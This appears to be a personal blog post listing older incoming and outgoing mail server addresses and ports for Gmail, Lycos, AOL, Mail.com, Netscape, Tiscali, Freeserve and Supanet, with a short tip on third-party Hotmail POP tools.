  • Google GMail Settings

  • The Google GMail service offers email client access for retrieving and sending emails through your Gmail account. However, for security reasons, GMail uses POP3 over an SSL connection, so make sure your email client supports encrypted SSL connections.
      Google Gmail Incoming Mail Server (POP3) - pop.gmail.com (SSL enabled, port 995)
      Outgoing Mail Server - use the SMTP mail server address provided by your local ISP or smtp.gmail.com (SSL enabled, port 465)
  • Lycos Mail Settings

  • The Lycos Mail Plus service allows you to use POP3 and SMTP servers for accessing your Lycos mailbox.
      Lycos Mail Incoming Mail Server (POP3) - pop.mail.lycos.com (port 110)
      Outgoing Mail Server - smtp.mail.lycos.com or use your local ISP SMTP mail server
  • AOL Mail Settings

  • The AOL email service is a web based system, designed for managing your AOL mailbox via HTTP IMAP access. Unlike Hotmail, you can use any email client to access your AOL mailbox, as long as it supports the IMAP protocol.
      AOL Incoming Mail Server (IMAP) - imap.aol.com (port 143)
      AOL Outgoing Mail Server - smtp.aol.com or use your local ISP SMTP mail server
  • Mail.com Mail Settings

  • The Mail.com email service allows you to use POP3 and SMTP servers for accessing your Mail.com mailbox.
      Mail.com Mail Incoming Mail Server (POP3) - pop1.mail.com (port 110)
      Outgoing Mail Server - use your local ISP SMTP mail server
  • Netscape Internet Service Mail Settings

  • The Netscape e-mail system is web-based, which means you can access their e-mail from any Internet connection. Netscape Internet Service also supports AOL® Communicator, Microsoft® Outlook, Microsoft® Outlook Express, and other POP3 e-mail software. The outgoing mail server needs SSL support, so make sure your email client software supports SSL connections over the SMTP protocol.
      Netscape Internet Service Incoming Mail Server (POP3) - pop.3.isp.netscape.com (port 110)
      Netscape Internet Service Outgoing Mail Server - smtp.isp.netscape.com (port 25, using a secure SSL connection)
  • Tiscali Mail Settings

  • The Tiscali email service allows you to use POP3 and SMTP servers for accessing your Tiscali mailbox.
      Tiscali Incoming Mail Server (POP3) - pop.tiscali.com (port 110)
      Outgoing Mail Server - use your local ISP SMTP mail server
  • Freeserve Mail Settings

  • The Freeserve email service allows you to use POP3 and SMTP servers for accessing your Freeserve mailbox.
      Freeserve Incoming Mail Server (POP3) - pop.freeserve.com (port 110)
      Outgoing Mail Server - use your local ISP SMTP mail server
  • Supanet Mail Settings

  • The Supanet email service allows you to use POP3 and SMTP servers for accessing your Supanet mailbox.
      Supanet Incoming Mail Server (POP3) - pop.supanet.com (port 110)
      Outgoing Mail Server - use your local ISP SMTP mail server
    If your email client does not support Hotmail as a Mail Service Provider or if it simply doesn't work with your mail server settings, you can use a 3rd party solution like Hotmail Popper, IzyMail, POP Peeper or Email2Pop. When using such tools, you should define your Hotmail account as a POP3 account and you will need to define your incoming mail server will as 'localhost' (or 127.0.0.1).

    About Me

    My photo
    mumbai, mumbai, India
    akash....... hacking tips & track plz use only for knowledge plz dont use misuse..........